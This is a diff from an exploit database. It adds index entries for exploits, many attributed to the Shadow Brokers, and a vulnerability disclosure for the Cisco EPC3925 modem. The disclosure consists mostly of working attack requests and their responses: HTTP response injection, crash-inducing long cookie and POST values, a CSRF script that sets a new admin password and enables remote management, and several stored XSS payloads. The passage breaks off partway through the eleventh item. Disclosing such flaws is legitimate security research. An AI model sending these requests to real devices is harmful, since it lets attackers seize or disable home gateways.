40257,platforms/windows/dos/40257.txt,"Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - Authentication Bypass (EXTRABACON)",2016-08-18,"Shadow Brokers",hardware,remote,161
|
||||
40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161
|
||||
40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
40260,platforms/cgi/webapps/40260.sh,"SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change",2016-08-18,"Todor Donev",cgi,webapps,80
|
||||
40261,platforms/cgi/webapps/40261.txt,"Honeywell IP-Camera HICC-1100PT - Credentials Disclosure",2016-08-18,"Yakir Wizman",cgi,webapps,80
|
||||
|
@ -36463,15 +36466,15 @@ id,file,description,date,author,platform,type,port
|
|||
40267,platforms/cgi/webapps/40267.txt,"MESSOA IP-Camera NIC990 - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80
|
||||
40268,platforms/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0
|
||||
40269,platforms/cgi/webapps/40269.txt,"ZYCOO IP Phone System - Remote Command Execution",2016-08-19,0x4148,cgi,webapps,0
|
||||
40270,platforms/linux/local/40270.txt,"Watchguard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)",2016-08-19,"Shadow Brokers",linux,local,0
|
||||
40271,platforms/hardware/local/40271.txt,"Cisco ASA / PIX - Privilege Escalation (EPICBANANA)",2016-08-19,"Shadow Brokers",hardware,local,0
|
||||
40272,platforms/cgi/webapps/40272.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40273,platforms/cgi/webapps/40273.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40274,platforms/cgi/webapps/40274.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL)",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR)",2016-08-19,"Shadow Brokers",hardware,remote,0
|
||||
40276,platforms/hardware/webapps/40276.txt,"Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)",2016-08-19,"Shadow Brokers",hardware,webapps,0
|
||||
40270,platforms/linux/local/40270.txt,"Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation",2016-08-19,"Shadow Brokers",linux,local,0
|
||||
40271,platforms/hardware/local/40271.txt,"Cisco ASA / PIX - 'EPICBANANA' Privilege Escalation",2016-08-19,"Shadow Brokers",hardware,local,0
|
||||
40272,platforms/cgi/webapps/40272.txt,"TOPSEC Firewalls - 'ELIGIBLECONTESTANT' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40273,platforms/cgi/webapps/40273.txt,"TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40274,platforms/cgi/webapps/40274.txt,"TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit",2016-08-19,"Shadow Brokers",hardware,remote,0
|
||||
40276,platforms/hardware/webapps/40276.txt,"Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution",2016-08-19,"Shadow Brokers",hardware,webapps,0
|
||||
40277,platforms/cgi/webapps/40277.sh,"MESSOA IP Cameras (Multiple Models) - Unauthenticated Password Change",2016-08-19,"Todor Donev",cgi,webapps,80
|
||||
40278,platforms/php/webapps/40278.txt,"tcPbX - (tcpbx_lang) Local File Inclusion",2016-08-19,0x4148,php,webapps,0
|
||||
40278,platforms/php/webapps/40278.txt,"tcPbX - 'tcpbx_lang' Local File Inclusion",2016-08-19,0x4148,php,webapps,0
|
||||
40308,platforms/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
|
||||
40282,platforms/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
|
||||
40283,platforms/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
|
||||
|
|
|
695
platforms/asp/webapps/40383.txt
Executable file
695
platforms/asp/webapps/40383.txt
Executable file
|
@ -0,0 +1,695 @@
|
|||
# Title: Cisco EPC 3925 Multiple Vulnerabilities
|
||||
# Vendor: http://www.cisco.com/
|
||||
# Vulnerable Version(s): Cisco EPC3925 (EuroDocsis 3.0 2-PORT Voice Gateway)
|
||||
# Date: 15.09.2016
|
||||
# Author: Patryk Bogdan
|
||||
|
||||
========
|
||||
|
||||
Vulnerability list:
|
||||
1. HTTP Response Injection via 'Lang' Cookie
|
||||
2. DoS via 'Lang' Cookie
|
||||
3. DoS in Wireless Client List via 'h_sortWireless'
|
||||
4. (Un)authorized modem restart (Channel Selection)
|
||||
5. CSRF
|
||||
6. Stored XSS in SMTP Settings (Administration -> Reportning)
|
||||
7. Stored XSS in User Name #1 (e.g Administration -> Managment / Setup -> Quick Setup)
|
||||
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
|
||||
9. Stored XSS in ToD Filter (Access Restrictions -> Time of Day Rules)
|
||||
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
|
||||
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
|
||||
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
|
||||
13. Stored XSS in DDNS Settings (Setup -> DDNS)
|
||||
14. Stored XSS in Advanced VPN Setup (Security -> VPN -> Advanced Settings)
|
||||
|
||||
========
|
||||
|
||||
1. HTTP Response Injection
|
||||
|
||||
It is able to inject arbitrary data into device memory via 'Lang' cookie,
|
||||
additional data will be stored until modem restart and will be returned with every http response.
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Docsis_system HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Docsis_system.asp
|
||||
Cookie: Lang=en; SessionID=171110
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 109
|
||||
|
||||
username_login=aaa&password_login=bbb&LanguageSelect=en%0d%0aSet-Cookie: pwned&Language_Submit=0&login=Log+In
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Docsis_system.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
(...)
|
||||
|
||||
|
||||
#2 - Request:
|
||||
GET / HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Set-Cookie: Lang=en
|
||||
Set-Cookie: pwned
|
||||
Set-Cookie: SessionID=219380
|
||||
Content-Length: 1398
|
||||
(...)
|
||||
|
||||
|
||||
2. DoS via 'Lang' Cookie
|
||||
|
||||
Modem crashes when cookie variable in request is too long.
|
||||
|
||||
#1 - Request (crash via http injection):
|
||||
POST /goform/Docsis_system HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Docsis_system.asp
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 142
|
||||
|
||||
username_login=aaa&password_login=bbb&LanguageSelect=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Docsis_system.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
|
||||
#2 - Request:
|
||||
GET /Docsis_system.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Docsis_system.asp
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Set-Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
Set-Cookie: SessionID=163190
|
||||
Content-Length: 18743
|
||||
(...)
|
||||
|
||||
At this point modem crashes:
|
||||
|
||||
C:\Users\Patryk>ping -n 10 192.168.100.1
|
||||
|
||||
Pinging 192.168.100.1 with 32 bytes of data:
|
||||
Request timed out.
|
||||
Request timed out.
|
||||
Reply from 192.168.0.10: Destination host unreachable.
|
||||
Reply from 192.168.0.10: Destination host unreachable.
|
||||
Reply from 192.168.0.10: Destination host unreachable.
|
||||
Reply from 192.168.0.10: Destination host unreachable.
|
||||
(...)
|
||||
|
||||
DoS can be also executed with single HTTP request, like this:
|
||||
GET / HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: */*
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/
|
||||
Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; SessionID=163190
|
||||
Connection: close
|
||||
|
||||
|
||||
3. DoS in Wireless Client List via 'h_sortWireless'
|
||||
|
||||
Modem crashes when variable for POST parameter 'h_sortWireless' is too long.
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/WClientMACList HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/WClientMACList.asp
|
||||
Cookie: Lang=en; SessionID=71750
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 94
|
||||
|
||||
sortWireless=status&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/WClientMACList.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
( ... crash ... )
|
||||
|
||||
|
||||
4. (Un)authorized channel Selection
|
||||
|
||||
On Cisco 3925 unauthorized user can edit device channel settings and restart the modem. Such functionality should be available only for logged users, for example it's disabled on EPC 3928.
|
||||
|
||||
|
||||
5. CSRF
|
||||
|
||||
There is no prevention against CSRF attacks, attacker can for example change admin credentials and enable remote managment in single request.
|
||||
|
||||
PoC:
|
||||
<script>
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "http://192.168.100.1/goform/Administration", true);
|
||||
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
||||
xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
|
||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
||||
xhr.withCredentials = true;
|
||||
var body = "connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=admin&sysPasswd=newpass&sysConfirmPasswd=newpass&remote_management=enable&http_wanport=8080&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=enable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common";
|
||||
var aBody = new Uint8Array(body.length);
|
||||
for (var i = 0; i < aBody.length; i++)
|
||||
aBody[i] = body.charCodeAt(i);
|
||||
xhr.send(new Blob([aBody]));
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
6. Stored XSS in Administration -> Reporting
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Log HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Log.asp
|
||||
Cookie: Lang=en; SessionID=457480
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 236
|
||||
|
||||
email_enable=enable&smtp_server=%22+onmouseover%3Dalert%281%29+x%3D%22y&email_for_log=%22+onmouseover%3Dalert%282%29+x%3D%22y&SmtpUsername=%22+onmouseover%3Dalert%283%29+x%3D%22y&SmtpPassword=aaa&save=Save+Settings&h_email_enable=enable
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Log.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Log.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Log.asp
|
||||
Cookie: Lang=en; SessionID=457480
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 6454
|
||||
(...)
|
||||
<TD>
|
||||
<input type="text" name="smtp_server" maxlength="255" size="30" value="" onmouseover=alert(1) x="y" />
|
||||
</TD>
|
||||
</TR>
|
||||
<tr>
|
||||
<TD>
|
||||
<script language="javascript" type="text/javascript">dw(va_log_email3);</script>
|
||||
</TD>
|
||||
<TD>
|
||||
<input type="text" name="email_for_log" maxlength="255" size="30" value="" onmouseover=alert(2) x="y"/>
|
||||
</TD>
|
||||
</TR>
|
||||
<tr>
|
||||
<TD>
|
||||
<script language="javascript" type="text/javascript">dw(msg_smtp_username);</script>
|
||||
</TD>
|
||||
<TD>
|
||||
<input type="text" name="SmtpUsername" maxlength="255" size="30" value="" onmouseover=alert(3) x="y" />
|
||||
</TD>
|
||||
</TR>
|
||||
(...)
|
||||
|
||||
|
||||
7. Stored XSS in User Name (Administration -> Managment / Setup -> Quick Setup)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Administration HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Administration.asp
|
||||
Cookie: Lang=en; SessionID=457480
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 746
|
||||
|
||||
connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sysPasswd=aaa&sysConfirmPasswd=aaa&remote_management=disable&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=disable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Quick_setup.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Quick_setup.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Administration.asp
|
||||
Cookie: Lang=en; SessionID=457480
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 34779
|
||||
(...)
|
||||
<tr>
|
||||
<td nowrap>
|
||||
<script language="javascript" type="text/javascript">dw(va_local_access2);</script>
|
||||
</td>
|
||||
<td nowrap>
|
||||
<script>alert('XSS')</script>
|
||||
</td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
|
||||
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Rg_UserSetup HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_UserSetup.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 118
|
||||
|
||||
NewUser=user onmouseover=alert('XSS')&Btn_AddUser=Add+User&AddUser=1&UserList=Default&RemoveUser=0&UserConfigChanged=0
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Rg_UserSetup.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Rg_UserSetup.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_UserSetup.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 9706
|
||||
(...)
|
||||
<select onchange="submit();" name="UserList">
|
||||
<option value=Default >1. Default<option value=user onmouseover=alert('XSS') selected>2. user onmouseover=alert('XSS
|
||||
</select>
|
||||
(...)
|
||||
|
||||
|
||||
9. Stored XSS in ToD Filter
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Rg_TodFilter HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_TodFilter.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 189
|
||||
|
||||
TodClient=<script>alert('XSS')</script>&TodAdd=Add&addTodClient=1&ToDComputers=No+filters+entered.&removeTodClient=&StartHour=12&StartMinute=00&StartAmPm=1&EndHour=12&EndMinute=00&EndAmPm=1
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Rg_TodFilter.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Rg_TodFilter.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_TodFilter.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 9140
|
||||
(...)
|
||||
<select name="ToDComputers" onChange="submit();">
|
||||
<option value=0 selected>1. <script>alert('XSS')</script>
|
||||
</select>
|
||||
(...)
|
||||
|
||||
|
||||
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Rg_ParentalBasic HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 282
|
||||
|
||||
NewContentRule=<script>alert('XSS')</script>&AddRule=Add+Rule&AddContentRule=1&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=&AllowedDomainAction=0&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Rg_ParentalBasic.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 11126
|
||||
(...)
|
||||
<select name="ContentRules" onChange="submit();">
|
||||
<option value=0 selected>1. Default<option value=1 >2. <script>alert('XSS')</script>
|
||||
</select>
|
||||
(...)
|
||||
|
||||
|
||||
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Rg_ParentalBasic HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 318
|
||||
|
||||
NewContentRule=&AddContentRule=&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&AddAllowedDomain=Add+Allowed+Domain&AllowedDomainAction=1&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Rg_ParentalBasic.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
|
